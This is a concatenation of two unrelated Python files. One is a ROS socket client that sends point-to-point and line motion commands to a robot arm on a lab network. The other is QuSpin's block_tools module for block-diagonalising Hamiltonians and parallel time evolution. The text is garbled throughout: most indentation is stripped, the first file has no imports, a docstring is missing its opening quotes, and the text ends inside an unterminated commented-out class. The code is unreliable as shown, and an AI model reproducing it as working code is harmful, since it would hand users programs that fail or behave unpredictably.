NAME = 'socket_server'
arm_mode_flag = False
##------------class pos-------
class point():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
pos = point(0.0,36.8,11.35,-90.0,0.0,0.0)
##------------class socket_cmd---------
class socket_data():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speedmode = Speedmode
socket_cmd = socket_data(0,0.0,0,0,0,0,0)
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
        return
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
##-----------client feedback arm state----------
class StateFeedback():
def __init__(self,ArmState,SentFlag):
self.ArmState = ArmState
self.SentFlag = SentFlag
state_feedback = StateFeedback(0,0)
def point_data(x,y,z,pitch,roll,yaw): ## receive pose data sent from the strategy side
pos.x = x
pos.y = y
pos.z = z
pos.pitch = pitch
pos.roll = roll
pos.yaw = yaw
##----------Arm Mode-------------###
def Arm_Mode(action,grip,ra,setvel,setboth): ## receive arm mode data sent from the strategy side
global arm_mode_flag
socket_cmd.action = action
socket_cmd.grip = grip
socket_cmd.ra = ra
socket_cmd.setvel = setvel
socket_cmd.setboth = setboth
arm_mode_flag = True
Socket_command()
##-------Arm Speed Mode------------###
def Speed_Mode(speedmode): ## receive speed mode data sent from the strategy side
global speed_mode_flag
socket_cmd.Speedmode = speedmode
def socket_talker(): ## create the server node
pub = rospy.Publisher('chatter', Int32MultiArray, queue_size=10)
rospy.init_node(NAME)
rate = rospy.Rate(10) # 10hz
print ("Ready to connect")
while not rospy.is_shutdown():
# hello_str = "hello world %s" % rospy.get_time()
state = Int32MultiArray()
state.data = [state_feedback.ArmState,state_feedback.SentFlag]
# rospy.loginfo(state)
pub.publish(state)
rate.sleep()
##---------- socket packet transmission ----------##
##--------------- socket: send arm commands -----------------
def Socket_command():
    global arm_mode_flag, data, Socket  # reuse the socket opened in socket_client()
if arm_mode_flag == True:
arm_mode_flag = False
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
            #------- set arm speed --------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
            #------- set arm delay time --------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
            #------- set arm fast/safe speed mode --------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
        socket_cmd.action = 6 ## switch back to the initial mode state
print(data)
print("Socket:", Socket)
        Socket.send(data.encode('utf-8')) # send the command string over the socket (must be encoded)
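# Hedged usage sketch (requires a live connection opened by socket_client(); the
# pose and speed values below are placeholders, not values from the original project):
def _example_move_ptp():
    point_data(0.0, 36.8, 11.35, -90.0, 0.0, 0.0)  # target pose
    Arm_Mode(Taskcmd.Action_Type.PtoP, grip=0, ra=Taskcmd.RA.ABS,
             setvel=10, setboth=Taskcmd.Ctrl_Mode.CTRL_POS)  # builds and sends the TCP command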
##-----------socket client--------
def socket_client():
global Socket
try:
Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
Socket.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
print('Connection has been successful')
except socket.error as msg:
print(msg)
sys.exit(1)
#print('Connection has been successful')
print(Socket.recv(1024))
while 1:
feedback_str = Socket.recv(1024)
        # the arm side reports its state
        if str(feedback_str[2]) == '48':# F: arm is Ready and can accept the next motion command
            state_feedback.ArmState = 0
        if str(feedback_str[2]) == '49':# T: arm is busy and cannot execute the next motion command
            state_feedback.ArmState = 1
        if str(feedback_str[2]) == '54':# 6: strategy finished
            state_feedback.ArmState = 6
            print("shutdown")
        # check the sent flag
        if str(feedback_str[4]) == '48':# returned 0 (false)
            state_feedback.SentFlag = 0
        if str(feedback_str[4]) == '49':# returned 1 (true)
            state_feedback.SentFlag = 1
        ##--------------- socket: send arm commands end -----------------
if state_feedback.ArmState == Taskcmd.Arm_feedback_Type.shutdown:
break
rospy.on_shutdown(myhook)
Socket.close()
##-----------socket client end--------
##------------- socket packet transmission end --------------##
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
    socket_cmd.action = 6 ## switch to the initial mode state
    ## multithreading
t = threading.Thread(target=socket_client)
    t.start() # start the thread
#time.sleep(1)
try:
socket_talker()
except rospy.ROSInterruptException:
pass
t.join()
    ## multithreading end
|
block_tools.py
|
# -*- coding: utf-8 -*-
from __future__ import print_function, division
# QuSpin modules
# numpy modules
import numpy as _np # generic math functions
# _scipy modules
import scipy as _scipy
import scipy.sparse as _sp
from scipy.sparse.linalg import expm_multiply as _expm_multiply
# multi-processing modules
from multiprocessing import Process as _Process
from multiprocessing import Queue as _Queue
from multiprocessing import Event as _Event
from joblib import Parallel as _Parallel
from joblib import delayed as _delayed
# six for python 2.* and 3.* dictionary compatibility
from six import iteritems as _iteritems
from six import itervalues as _itervalues
try:
from itertools import izip as _izip
except ImportError:
_izip = zip
__all__=["block_diag_hamiltonian","block_ops"]
def block_diag_hamiltonian(blocks,static,dynamic,basis_con,basis_args,dtype,basis_kwargs={},get_proj_kwargs={},get_proj=True,check_symm=True,check_herm=True,check_pcon=True):
"""Block-diagonalises a Hamiltonian obeying a symmetry.
The symmetry blocks are created via the argument 'blocks'.
Examples
--------
    The example below demonstrates how to use the `block_diag_hamiltonian()` function to block-diagonalise
the single-particle Hamiltonian
.. math::
H=\\sum_j (J+(-1)^j\\delta J)b^\\dagger_{j+1} b_j + \\mathrm{h.c.} + \\Delta(-1)^j b^\\dagger_j b_j
    with respect to translation symmetry. The Fourier transform is computed along the way.
.. literalinclude:: ../../doc_examples/block_diag_hamiltonian-example.py
:linenos:
:language: python
:lines: 7-
Parameters
-----------
blocks : list/tuple/iterator
Contains the symmetry blocks to construct the Hamiltonian with, as dictionaries.
static : list
Static operator list used to construct the block Hamiltonians. Follows `hamiltonian` format.
dynamic : list
Dynamic operator list used to construct the block Hamiltonians. Follows `hamiltonian` format.
basis_con : :obj:`basis`
Basis constructor used to build the basis objects to create the block diagonal Hamiltonians.
basis_args : tuple
This argument is passed as the first argument for `basis_con`.
Contains all required arguments for the basis.
dtype : 'type'
The data type (e.g. numpy.float64) to construct the Hamiltonian with.
get_proj : bool, optional
Flag which tells the function to calculate and return the projector to the
        symmetry-block subspace requested. Default is 'True'.
basis_kwargs : dict, optional
Dictionary of keyword arguments to add when calling `basis` constructor.
get_proj_kwargs : dict, optional
Dictionary of keyword arguments for `basis.get_proj()` and `basis.project_from()`.
check_symm : bool, optional
Enable/Disable symmetry check of the operators for the first Hamiltonian constructed.
check_herm : bool, optional
Enable/Disable hermiticity check of the operators for the first Hamiltonian constructed.
check_pcon : bool, optional
Enable/Disable particle conservation check of the operators for the first Hamiltonian constructed.
Returns
--------
tuple
P : scipy.sparse.csr
            Projector to the symmetry-block subspace (e.g. Fourier transform in case of momentum blocks).
H : `obj`
`hamiltonian` object in block diagonal form.
Raises
------
ValueError
If `blocks` is not a list of `hamiltonian` objects or a list of dictionaries containing
the symmetry sectors.
"""
from ..operators import hamiltonian
H_list = []
P_list = []
blocks = list(blocks)
if all([isinstance(block,dict) for block in blocks]):
[blocks[i].update(basis_kwargs) for i in range(len(blocks))]
dynamic_list = [(tup[-2],tuple(tup[-1])) for tup in dynamic]
dynamic_list = [([],f,f_args) for f,f_args in set(dynamic_list)]
static_mats = []
for block in blocks:
b = basis_con(*basis_args,**block)
if get_proj:
P = b.get_proj(dtype,**get_proj_kwargs)
P_list.append(P)
H = hamiltonian(static,dynamic,basis=b,dtype=dtype,check_symm=check_symm,check_herm=check_herm,check_pcon=check_pcon)
check_symm = False
check_herm = False
check_pcon = False
static_mats.append(H.static.tocoo())
for i,Hd in enumerate(_itervalues(H.dynamic)):
dynamic_list[i][0].append(Hd.tocoo())
static = [_sp.block_diag(static_mats,format="csr")]
dynamic = []
for mats,f,f_args in dynamic_list:
mats = _sp.block_diag(mats,format="csr")
dynamic.append([mats,f,f_args])
else:
raise ValueError("blocks must be list of dictionaries containing symmetry sectors.")
if get_proj:
P = _sp.hstack(P_list,format="csr")
return P,hamiltonian(static,dynamic,copy=False)
else:
return hamiltonian(static,dynamic,copy=False)
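# Hedged usage sketch (assumes QuSpin's spin_basis_1d is importable): block-diagonalise
# a periodic, uniform zz coupling over all momentum sectors of a spin-1/2 chain.
def _example_block_diag(L=6, J=1.0):
    from quspin.basis import spin_basis_1d  # assumed import path
    J_zz = [[J, j, (j + 1) % L] for j in range(L)]  # periodic-boundary couplings
    static = [["zz", J_zz]]
    blocks = [dict(kblock=k) for k in range(L)]  # one block per momentum sector
    P, H = block_diag_hamiltonian(blocks, static, [], spin_basis_1d, (L,),
                                  _np.complex128, get_proj=True)
    return P.shape, H.Ns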
def _worker(gen_func,args_list,q,e):
"""
    Worker function which loops over one or more generators provided by `gen_func` and returns the result
via queue `q`.
Waits for signal from `e` before continuing.
"""
gens = []
for arg in args_list:
gens.append(gen_func(*arg))
generator = _izip(*gens)
for s in generator:
e.clear()
q.put(s)
e.wait()
q.close()
def _generate_parallel(n_process,n_iter,gen_func,args_list):
"""
Generator which spawns processes to run generators, then uses a queue for each process to retrieve
the results which it then yields.
"""
n_items = len(args_list)
# calculate how to distribute generators over processes.
if n_items <= n_process and n_process > 0:
n_process = n_items
n_pp = 1
n_left = 1
elif n_items > n_process and n_process > 0:
n_pp = n_items//n_process
n_left = n_pp + n_items%n_process
# if one process specified just do the generator without sub processes.
if n_process <= 1:
gens = []
for arg in args_list:
gens.append(gen_func(*arg))
generator = _izip(*gens)
for s in generator:
yield s
return
# split up argument list
sub_lists = [args_list[0:n_left]]
sub_lists.extend([ args_list[n_left + i*n_pp:n_left + (i+1)*n_pp] for i in range(n_process-1)])
# create lists of queues, events, and processes.
es = []
qs = []
ps = []
for i in range(n_process):
e = _Event()
q = _Queue(1)
p = _Process(target=_worker, args=(gen_func,sub_lists[i],q,e))
p.daemon = True
es.append(e)
qs.append(q)
ps.append(p)
# start processes
for p in ps:
p.start()
# for number of iterations
for i in range(n_iter):
s = []
# retrieve results for each sub-process and let the process know to continue calculation.
for q,e in _izip(qs,es):
s.extend(q.get())
e.set() # free process to do next calculation
# yield all results
yield tuple(s)
# end processes
for p in ps:
p.join()
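# Hedged illustration (not part of QuSpin): drive three toy generators through
# _generate_parallel with two worker processes and collect the zipped results.
def _count_gen(start, n):
    for i in range(n):
        yield start + i

def _example_generate_parallel():
    args_list = [(0, 3), (100, 3), (200, 3)]
    # expected output: [(0, 100, 200), (1, 101, 201), (2, 102, 202)]
    return list(_generate_parallel(2, 3, _count_gen, args_list))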
def _evolve_gen(psi,H,t0,times,stack_state,imag_time,solver_name,solver_args):
"""Generating function for evolution with `H.evolve`."""
for psi in H.evolve(psi,t0,times,stack_state=stack_state,imag_time=imag_time,solver_name=solver_name,iterate=True,**solver_args):
yield psi
def _expm_gen(psi,H,times,dt):
"""Generating function for evolution via `_expm_multiply`."""
if times[0] != 0:
H *= times[0]
psi = _expm_multiply(H,psi)
H /= times[0]
yield psi
H *= dt
for t in times[1:]:
psi = _expm_multiply(H,psi)
yield psi
H /= dt
def _block_evolve_iter(psi_blocks,H_list,P,t0,times,stack_state,imag_time,solver_name,solver_args,n_jobs):
"""using `_generate_parallel` to get block evolution yields state in full H-space."""
args_list = [(psi_blocks[i],H_list[i],t0,times,stack_state,imag_time,solver_name,solver_args) for i in range(len(H_list))]
for psi_blocks in _generate_parallel(n_jobs,len(times),_evolve_gen,args_list):
psi_t = _np.hstack(psi_blocks)
yield P.dot(psi_t)
def _block_expm_iter(psi_blocks,H_list,P,start,stop,num,endpoint,n_jobs):
"""using `_generate_parallel` to get block evolution yields state in full H-space."""
times,dt = _np.linspace(start,stop,num=num,endpoint=endpoint,retstep=True)
args_list = [(psi_blocks[i],H_list[i],times,dt) for i in range(len(H_list))]
for psi_blocks in _generate_parallel(n_jobs,len(times),_expm_gen,args_list):
psi_t = _np.hstack(psi_blocks)
yield P.dot(psi_t)
def _block_evolve_helper(H,psi,t0,times,stack_state,imag_time,solver_name,solver_args):
"""helper functions for doing evolution not with iterator."""
return H.evolve(psi,t0,times,stack_state=stack_state,imag_time=imag_time,solver_name=solver_name,**solver_args)
class block_ops(object):
"""Splits up the dynamics of a state over various symmetry sectors.
Particularly useful if the initial state does NOT obey a symmetry but the hamiltonian does.
Moreover, we provide a multiprocessing option which allows the user to split up the dynamics
over multiple processing cores.
Can be used to calculate nonequal time correlators in symmetry-reduced sectors.
Notes
-----
The `block_ops` object is initialised only after calling the function methods of the class to save memory.
Examples
--------
The following sequence of examples uses the Bose-Hubbard model
.. math::
H=-J\\sum_j b^\\dagger_{j+1}b_j + \\mathrm{h.c.} + \\frac{U}{2}\\sum_j n_j(n_j-1)
to show how to use the `block_ops` class to evolve a Fock state, which explicitly breaks
translational invariance, by decomposing it in all momentum blocks, time-evolving the projections, and putting
the state back together in the Fock basis in the end. We use the time-evolved state to measure the local density operator :math:`n_j`.
The code snippets for the time evolution can be found in the examples for the function methods of the class.
The code snippet below initiates the class, and is required to run the example codes for the function methods.
.. literalinclude:: ../../doc_examples/block_ops-example.py
:linenos:
:language: python
:lines: 7-55
"""
def __init__(self,blocks,static,dynamic,basis_con,basis_args,dtype,basis_kwargs={},get_proj_kwargs={},save_previous_data=True,compute_all_blocks=False,check_symm=True,check_herm=True,check_pcon=True):
"""Instantiates the `block_ops` class.
Parameters
-----------
blocks : list/tuple/iterator
Contains the symmetry blocks to construct the Hamiltonian with,
as dictionaries or `hamiltonian` objects.
static : list
Static operator list used to construct the block Hamiltonians. Follows `hamiltonian` format.
dynamic : list
Dynamic operator list used to construct the block Hamiltonians. Follows `hamiltonian` format.
basis_con : :obj:`basis`
Basis constructor used to build the basis objects to create the block diagonal Hamiltonians.
basis_args : tuple
This argument is passed as the first argument for `basis_con`.
Contains all required arguments for the basis.
dtype : 'type'
The data type (e.g. numpy.float64) to construct the Hamiltonian with.
basis_kwargs : dict, optional
Dictionary of keyword arguments to add when calling `basis` constructor.
get_proj_kwargs : dict, optional
Dictionary of keyword arguments for `basis.get_proj()` and `basis.project_from()`.
save_previous_data : bool, optional
To do time evolution the `block_ops` class constructs Hamiltonians, which can take time.
Set this flag to `True`, and the class will save previously calculated Hamiltonians, so
next time one needs to do evolution in that block, the code does NOT have to calculate it again.
Default is `True`.
compute_all_blocks : bool, optional
Flag which tells the `block_ops` class to compute all symmetry blocks at initialization.
Default is `False`.
This option sets `save_previous_data = True` automatically.
check_symm : bool, optional
Enable/Disable symmetry check of the operators for the first Hamiltonian constructed.
check_herm : bool, optional
Enable/Disable hermiticity check of the operators for the first Hamiltonian constructed.
check_pcon : bool, optional
Enable/Disable particle conservation check of the operators for the first Hamiltonian constructed.
"""
self._basis_dict = {}
self._H_dict = {}
self._P_dict = {}
self._dtype=dtype
self._save = save_previous_data
self._static = static
self._dynamic = dynamic
self._checks = {"check_symm":check_symm,"check_herm":check_herm,"check_pcon":check_pcon}
self._no_checks = {"check_symm":False,"check_herm":False,"check_pcon":False}
self._checked = False
self._get_proj_kwargs = get_proj_kwargs
for block in blocks:
block.update(basis_kwargs)
b = basis_con(*basis_args,**block)
if b.Ns > 0:
self._basis_dict[str(block)]=b
if compute_all_blocks:
self._save=True
self.compute_all_blocks()
@property
def dtype(self):
"""type: numpy data type to store the block hamiltonians in."""
return self._dtype
@property
def save_previous_data(self):
"""bool: reflects state of optimal argument `save_previous_data`."""
return self._save
@property
def H_dict(self):
"""dict: dictionary which contains the block Hamiltonians under keys labelled by the symmetry blocks,
e.g. `str(block)` where `block` is a block dictionary variable.
"""
return self._H_dict
@property
def P_dict(self):
"""dict: dictionary which contains the block projectors under keys labelled by the symmetry blocks,
e.g. `str(block)` where `block` is a block dictionary variable.
"""
return self._P_dict
@property
def basis_dict(self):
"""dict: dictionary which contains the `basis` objects under keys labelled by the symmetry blocks,
e.g. `str(block)` where `block` is a block dictionary variable.
"""
return self._basis_dict
@property
def static(self):
"""list: contains the static operators used to construct the symmetry-block Hamiltonians."""
return list(self._static)
@property
def dynamic(self):
"""list: contains the dynamic operators used to construct the symmetry-block Hamiltonians."""
return list(self._dynamic)
def update_blocks(self,blocks,basis_con,basis_args,compute_all_blocks=False):
        Allows updating the `blocks` variable of the class.
Parameters
-----------
blocks : list/tuple/iterator
Contains the new symmetry blocks to be added to the `basis_dict` attribute of the class,
as dictionaries or `hamiltonian` objects.
basis_con : :obj:`basis`
Basis constructor used to build the basis objects to create the new block diagonal Hamiltonians.
basis_args : tuple
This argument is passed as the first argument for `basis_con`.
Contains all required arguments for the basis.
compute_all_blocks : bool, optional
Flag which tells the `block_ops` class to compute all symmetry blocks at initialization.
Default is `False`.
"""
blocks = list(blocks)
for block in blocks:
if str(block) not in self._basis_dict.keys():
b = basis_con(*basis_args,**block)
if b.Ns > 0:
self._basis_dict[str(block)]=b
if compute_all_blocks:
self.compute_all_blocks()
def compute_all_blocks(self):
"""Sets `compute_all_blocks = True`.
Examples
--------
The example below builds on the code snippet shown in the description of the `block_ops` class.
.. literalinclude:: ../../doc_examples/block_ops-example.py
:linenos:
:language: python
:lines: 57-58
"""
from ..operators import hamiltonian
for key,b in _iteritems(self._basis_dict):
if self._P_dict.get(key) is None:
p = b.get_proj(self.dtype,**self._get_proj_kwargs)
self._P_dict[key] = p
if self._H_dict.get(key) is None:
if not self._checked:
H = hamiltonian(self._static,self._dynamic,basis=b,dtype=self.dtype,**self._checks)
self._checked=True
else:
H = hamiltonian(self._static,self._dynamic,basis=b,dtype=self.dtype,**self._no_checks)
self._H_dict[key] = H
def _get_P(self,key):
if self._P_dict.get(key) is None:
p = self._basis_dict[key].get_proj(self.dtype,**self._get_proj_kwargs)
if self._save:
self._P_dict[key] = p
return p
else:
return self._P_dict[key]
def _get_H(self,key):
from ..operators import hamiltonian
if self._H_dict.get(key) is None:
if not self._checked:
H = hamiltonian(self._static,self._dynamic,basis=self._basis_dict[key],dtype=self.dtype,**self._checks)
self._checked=True
else:
H = hamiltonian(self._static,self._dynamic,basis=self._basis_dict[key],dtype=self.dtype,**self._no_checks)
if self._save:
self._H_dict[key] = H
return H
else:
return self._H_dict[key]
def evolve(self,psi_0,t0,times,iterate=False,n_jobs=1,block_diag=False,stack_state=False,imag_time=False,solver_name="dop853",**solver_args):
"""Creates symmetry blocks of the Hamiltonian and then uses them to run `hamiltonian.evolve()` in parallel.
**Arguments NOT described below can be found in the documentation for the `hamiltonian.evolve()` method.**
Examples
--------
The example below builds on the code snippet shown in the description of the `block_ops` class.
.. literalinclude:: ../../doc_examples/block_ops-example.py
:linenos:
:language: python
:lines: 69-
Parameters
-----------
psi_0 : numpy.ndarray, list, tuple
            Quantum state defined on the full Hilbert space of the problem.
            Does not need to obey any sort of symmetry.
        t0 : float
            Initial time to start the evolution at.
        times : numpy.ndarray, list
            Contains the times to compute the solution at. Must be an iterable object.
iterate : bool, optional
Flag to return generator when set to `True`. Otherwise the output is an array of states.
Default is 'False'.
n_jobs : int, optional
            Number of processes requested for computing the time-evolution dynamics.
            NOTE: one of those processes is used to gather results. For best performance, all blocks
            should be approximately the same size and `n_jobs-1` must be a common divisor of the number of
blocks, such that there is roughly an equal workload for each process. Otherwise the computation
will be as slow as the slowest process.
block_diag : bool, optional
            When set to `True`, this flag puts the Hamiltonian matrices for the separate symmetry blocks
into a list and then loops over it to do time evolution. When set to `False`, it puts all
blocks in a single giant sparse block diagonal matrix. Default is `False`.
This flag is useful if there are a lot of smaller-sized blocks.
Returns
--------
obj
if `iterate = True`, returns generator which generates the time dependent state in the
full H-space basis.
if `iterate = False`, returns `numpy.ndarray` which has the time-dependent states in the
full H-space basis in the rows.
Raises
------
ValueError
Variable `imag_time=True` option on `hamiltonian.evolve()` method not supported.
ValueError
`iterate=True` requires `times` to be an array or a list.
RuntimeError
Terminates when initial state has no projection onto the specified symmetry blocks.
"""
if imag_time:
raise ValueError("imaginary time not supported for block evolution.")
P = []
H_list = []
psi_blocks = []
for key,b in _iteritems(self._basis_dict):
p = self._get_P(key)
if _sp.issparse(psi_0):
psi = p.H.dot(psi_0).toarray()
else:
psi = p.H.dot(psi_0)
psi = _np.asarray(psi).ravel()
if _np.linalg.norm(psi) > 1000*_np.finfo(self.dtype).eps:
psi_blocks.append(psi)
P.append(p.tocoo())
H_list.append(self._get_H(key))
if block_diag and H_list:
N_H = len(H_list)
n_pp = N_H//n_jobs
n_left = n_pp + N_H%n_jobs
H_list_prime = []
psi_blocks_prime = []
if n_left != 0:
H_list_prime.append(block_diag_hamiltonian(H_list[:n_left],None,None,None,None,self._dtype,get_proj=False,**self._no_checks))
                psi_blocks_prime.append(_np.hstack(psi_blocks[:n_left]))
for i in range(n_jobs-1):
i1 = n_left + i*n_pp
i2 = n_left + (i+1)*n_pp
H_list_prime.append(block_diag_hamiltonian(H_list[i1:i2],None,None,None,None,self._dtype,get_proj=False,**self._no_checks))
                psi_blocks_prime.append(_np.hstack(psi_blocks[i1:i2]))
H_list = H_list_prime
psi_blocks = psi_blocks_prime
if len(H_list) > 0:
P = _sp.hstack(P,format="csr")
if iterate:
if _np.isscalar(times):
raise ValueError("If iterate=True times must be a list/array.")
return _block_evolve_iter(psi_blocks,H_list,P,t0,times,stack_state,imag_time,solver_name,solver_args,n_jobs)
else:
psi_t = _Parallel(n_jobs = n_jobs)(_delayed(_block_evolve_helper)(H,psi,t0,times,stack_state,imag_time,solver_name,solver_args) for psi,H in _izip(psi_blocks,H_list))
psi_t = _np.vstack(psi_t)
psi_t = P.dot(psi_t)
return psi_t
else:
raise RuntimeError("initial state has no projection on to specified blocks.")
def expm(self,psi_0,H_time_eval=0.0,iterate=False,n_jobs=1,block_diag=False,a=-1j,start=None,stop=None,endpoint=None,num=None,shift=None):
"""Creates symmetry blocks of the Hamiltonian and then uses them to run `_expm_multiply()` in parallel.
**Arguments NOT described below can be found in the documentation for the `exp_op` class.**
Examples
--------
The example below builds on the code snippet shown in the description of the `block_ops` class.
.. literalinclude:: ../../doc_examples/block_ops-example.py
:linenos:
:language: python
:lines: 60-67
Parameters
-----------
psi_0 : numpy.ndarray, list, tuple
            Quantum state defined on the full Hilbert space of the problem.
            Does not need to obey any sort of symmetry.
H_time_eval : numpy.ndarray, list
Times to evaluate the Hamiltonians at when doing the matrix exponentiation.
iterate : bool, optional
Flag to return a generator when set to `True`. Otherwise the output is an array of states.
Default is `False`.
n_jobs : int, optional
Number of processes requested for computing the time evolution dynamics.
NOTE: one of those processes is used to gather results. For best performance, all blocks
should be approximately the same size and `n_jobs-1` must be a divisor of the number of
blocks, such that there is roughly an equal workload for each process. Otherwise the computation
will be as slow as the slowest process.
block_diag : bool, optional
When set to `True`, this flag puts the Hamiltonian matrices for the separate symmetry blocks
into a list and then loops over it to do time evolution. When set to `False`, it puts all
blocks in a single giant sparse block diagonal matrix. Default is `False`.
This flag is useful if there are a lot of smaller-sized blocks.
Returns
--------
obj
if `iterate = True`, returns a generator which yields the time-dependent states in the
full H-space basis.
if `iterate = False`, returns a `numpy.ndarray` which holds the time-dependent states in the
full H-space basis in its rows.
Raises
------
ValueError
Various `ValueError`s of `exp_op` class.
RuntimeError
Terminates when initial state has no projection onto the specified symmetry blocks.
"""
from ..operators import hamiltonian
if iterate:
if start is None and stop is None:
raise ValueError("'iterate' can only be True with time discretization. must specify 'start' and 'stop' points.")
if num is not None:
if type(num) is not int:
raise ValueError("expecting integer for 'num'.")
else:
num = 50
if endpoint is not None:
if type(endpoint) is not bool:
raise ValueError("expecting bool for 'endpoint'.")
else:
endpoint = True
else:
if start is None and stop is None:
if num is not None:
raise ValueError("unexpected argument 'num'.")
if endpoint is not None:
raise ValueError("unexpected argument 'endpoint'.")
else:
if not (_np.isscalar(start) and _np.isscalar(stop)):
raise ValueError("expecting scalar values for 'start' and 'stop'")
if not (_np.isreal(start) and _np.isreal(stop)):
raise ValueError("expecting real values for 'start' and 'stop'")
if num is not None:
if type(num) is not int:
raise ValueError("expecting integer for 'num'.")
else:
num = 50
if endpoint is not None:
if type(endpoint) is not bool:
raise ValueError("expecting bool for 'endpoint'.")
else:
endpoint = True
P = []
H_list = []
psi_blocks = []
for key,b in _iteritems(self._basis_dict):
p = self._get_P(key)
if _sp.issparse(psi_0):
psi = p.H.dot(psi_0).toarray()
else:
psi = p.H.dot(psi_0)
psi = psi.ravel()
if _np.linalg.norm(psi) > 1000*_np.finfo(self.dtype).eps:
psi_blocks.append(psi)
P.append(p.tocoo())
H = self._get_H(key)
H = H(H_time_eval)*a
if shift is not None:
H += a*shift*_sp.identity(b.Ns,dtype=self.dtype)
H_list.append(H)
if block_diag and H_list:
N_H = len(H_list)
n_pp = N_H//n_jobs
n_left = n_pp + N_H%n_jobs
H_list_prime = []
psi_blocks_prime = []
psi_block = _np.hstack(psi_blocks[:n_left])
H_block = _sp.block_diag(H_list[:n_left],format="csr")
H_list_prime.append(H_block)
psi_blocks_prime.append(psi_block)
for i in range(n_jobs-1):
i1 = n_left + i*n_pp
i2 = n_left + (i+1)*n_pp
psi_block = _np.hstack(psi_blocks[i1:i2])
H_block = _sp.block_diag(H_list[i1:i2],format="csr")
H_list_prime.append(H_block)
psi_blocks_prime.append(psi_block)
H_list = H_list_prime
psi_blocks = psi_blocks_prime
H_is_complex = _np.iscomplexobj([_np.float32(1.0).astype(H.dtype) for H in H_list])
if H_list:
P = _sp.hstack(P,format="csr")
if iterate:
return _block_expm_iter(psi_blocks,H_list,P,start,stop,num,endpoint,n_jobs)
else:
ver = [int(v) for v in _scipy.__version__.split(".")]
if H_is_complex and (start,stop,num,endpoint) != (None,None,None,None) and ver[1] < 19:
mats = _block_expm_iter(psi_blocks,H_list,P,start,stop,num,endpoint,n_jobs)
return _np.array([mat for mat in mats]).T
else:
psi_t = _Parallel(n_jobs = n_jobs)(_delayed(_expm_multiply)(H,psi,start=start,stop=stop,num=num,endpoint=endpoint) for psi,H in _izip(psi_blocks,H_list))
psi_t = _np.hstack(psi_t).T
psi_t = P.dot(psi_t)
return psi_t
else:
raise RuntimeError("initial state has no projection on to specified blocks.")
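# Hedged usage sketch (illustrative only): evaluating exp(a*H(H_time_eval))|psi_0> over a
# time grid with the same hypothetical `U` object as above might look like
#
#     psi_t = U.expm(psi_0, H_time_eval=0.0, a=-1j, start=0.0, stop=10.0, num=101,
#                    endpoint=True, n_jobs=4, block_diag=True)
#
# which parallelises `_expm_multiply()` over the symmetry blocks as described in the docstring.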
'''
# TO DO
=======
class block_diag_ensemble(object):
def __init__(self,blocks,static,dynamic,basis_con,basis_args,dtype,get_proj_kwargs={},save_previous_data=True,compute_all_blocks=False,check_symm=True,check_herm=True,check_pcon=True):
"""
This class is used to split the dynamics of a state up over various symmetry sectors if the initial state does
not obey the symmetry but the hamiltonian does. Moreover we provide a multiprocessing option which allows the
user to split the dynamics up over multiple cores.
---arguments---
* blocks: (required) list/tuple/iterator which contains the blocks the user would like to put into the hamiltonian as dictionaries.
* static: (required) the static operator list which is used to construct the block hamiltonians. follows hamiltonian format.
* dynamic: (required) the dynamic operator list which is used to construct the block hamiltonians. follows hamiltonian format.
* basis_con: (required) the basis constructor used to construct the basis objects which will create the block diagonal hamiltonians.
* basis_args: (required) tuple which gets passed as the first argument for basis_con, contains required arguments.
* dtype: (required) the data type to construct the hamiltonian with.
* save_previous_data: (optional) when doing the evolution this class has to construct the hamiltonians. this takes
some time and so by setting this to true, the class will keep previously calculated hamiltonians so that next time
it needs to do evolution in that block it doesn't have to calculate it again.
